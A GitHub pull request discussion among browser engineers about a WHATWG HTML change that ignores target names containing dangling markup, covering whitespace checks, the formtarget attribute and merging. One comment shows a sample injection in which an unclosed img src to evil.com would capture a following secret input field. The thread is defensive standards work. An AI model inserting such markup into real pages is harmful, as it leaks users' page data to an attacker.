Ignore dangling markup in target name

[shhnjk]

Dangling markup injection mitigation aimed to mitigate attacks which abused URL parsers. Since then, folks have found a way to leak information using target attributes.

The usage of such target names is low. And therefore it'd be great if we can close this hole in the dangling markup injection mitigation.

• At least two implementers are interested (and none opposed):
  • Chromium.
  • Mozilla.
  • Webkit.
• Tests are written and can be reviewed and commented upon at:
  • Add a runtime enabled feature for Dangling Markup in target name web-platform-tests/wpt#40232
• Implementation bugs are filed:
  • Chromium: https://bugs.chromium.org/p/chromium/issues/detail?id=1421440
  • Gecko: https://bugzilla.mozilla.org/show_bug.cgi?id=1835157.
  • WebKit: https://bugs.webkit.org/show_bug.cgi?id=257349.

---

/document-sequences.html ( diff )
/form-control-infrastructure.html ( diff )
/infrastructure.html ( diff )
/semantics.html ( diff )

[shhnjk]

CC: @mikewest.

[mikewest]

Only one substantive comment around what whitespace we're looking for. I'd defer to others around how the behavior should be described around like 89930.

(Are you by any chance interested in picking up the refactoring described in whatwg/fetch#546 (comment) to potentially get non-Chromium implementers interested?)

[shhnjk]

I've moved the logic to only take effect on html attributes (and not JS APIs likewindow.open()). PTAL :)

(Are you by any chance interested in picking up the refactoring described in whatwg/fetch#546 (comment) to potentially get non-Chromium implementers interested?)

Is the only change required just this? If so, it's a small change that I can work on.

[zcorpan]

Is the tab or newline check needed? It seems simpler to just check for <

[shhnjk]

Is the tab or newline check needed? It seems simpler to just check for <

This change follows the same logic as previous dangling markup injection mitigation. If we were to only check for <, we have to change the use counter in Chromium to see if that's compatible first.

[mikewest]

@zcorpan: For URLs, checking the removable whitespace was both pragmatic (since we're already walking the string to find and remove those characters) and a good limiting function to target the worrying cases we cared about, since those were most likely to include a tag starting on a line other than the injection point. That is, distinguishing:

<img src="https://totally.reasonable/?tag=<a>">

from:

<img src="https://evil.com/?
...
<input name=sekrit value=value> 

It seems ideal from an explainability perspective to maintain the same checks in both places (assuming we can agree on the URL checks). That gives us the best chance of explaining to developers what we're doing.

@shhnjk: Agreeing on the URL checks would require different work than whatwg/url#284. That PR matches what Chromium ships, but others were concerned about adding this concept to URL, and would have preferred for it to live as a chokepoint in HTML instead. There's more more discussion necessary around that, as I'm pretty confident that the implementation is performance-critical (we had to roll it back at least once to improve performance AFAIR), and doing it at the same time that we're already walking through the URL turned out to be the best approach. So, my hope would be that we could have some sort of "removed whitespace" flag in URL, and use those in HTML (rather than Fetch). That said, this discussion is very tangential to the PR we're discussing. :)

[zcorpan]

@mikewest ok. Many sites use minimizers and therefore no tabs or newlines, and so would still be vulnerable, right? Maybe any ASCII whitespace and < would still catch injection in minimized HTML but allow legitimate URLs (since they shouldn't contain any whitespace).

[mikewest]

I'm happy to explore other heuristics. Just using URL's list of removable whitespace and < was one approach we were able to ship successfully for fetches in Chrome. If other combinations of whitespace and < are preferable, we can probably try to gather metrics (though I worry a bit about the cost of putting more branches into our URL parser, which turns out to be important to keep fast).

[annevk]

You also forgot about the formtarget attribute. We probably want to restructure "get an element's target" to make that less likely going forward. Perhaps it should take a target value as argument as well and in that case only the validation happens.

[shhnjk]

You also forgot about the formtarget attribute. We probably want to restructure "get an element's target" to make that less likely going forward. Perhaps it should take a target value as argument as well and in that case only the validation happens.

Since formtarget must have values that are valid navigable target names or keywords, I think that should be covered by the change we are making to the valid navigable target name?

[annevk]

Validity requirements don't affect user agents. Just conformance checkers.

[shhnjk]

Validity requirements don't affect user agents. Just conformance checkers.

Thanks for the info! Added the change you've suggested. PTAL 😊

[shhnjk]

I think it doesn't make sense to tighten the mitigation just for target attributes, if the URL parser is still checking for newlines and <.

That never got standardized however. I guess I'm willing to trust Chromium is willing to see that through and merge this with that understanding though.

That would be great. It doesn't seem like I can fork whatwg/html twice at the same time, so I'd like to merge this change and start freshly for whatwg/fetch#546.

[shhnjk]

@annevk, it looks like Webkit already made a change based on this spec. However, Blink have not yet made this change due to pending approval for this PR. Could you PTAL and let me know if there's anything I can do to help approve this PR? Thanks in advance! 🙂

[annevk]

You need to rebase this to ensure all the CI checks start running properly again. git rebase main followed by git push --force should do the trick. Then address the nits in a new commit.

I'll aim to have this merged next week at the latest. Thanks for your patience!

[annevk]

You need to fully rebase this as I suggested. PR Preview doesn't build at the moment and I suspect it's because of that.

[shhnjk]

You need to fully rebase this as I suggested. PR Preview doesn't build at the moment and I suspect it's because of that.

I tried git rebase main and git push --force but it just says Everything up-to-date. I also tried this and it seems to build successfully.

[shhnjk]

PR Preview now works!

[annevk]

Thanks, is there a PR to rename the test away from tentative?

[annevk]

Please double check the nits I pushed.

[shhnjk]

Thanks, is there a PR to rename the test away from tentative?

No there isn't, but I can work on it 🙂

Please double check the nits I pushed.

LGTM! I not authorized to merge this PR so please feel free to do so!

[annevk]

Thanks @shhnjk! Looking forward to the follow-up work around URLs.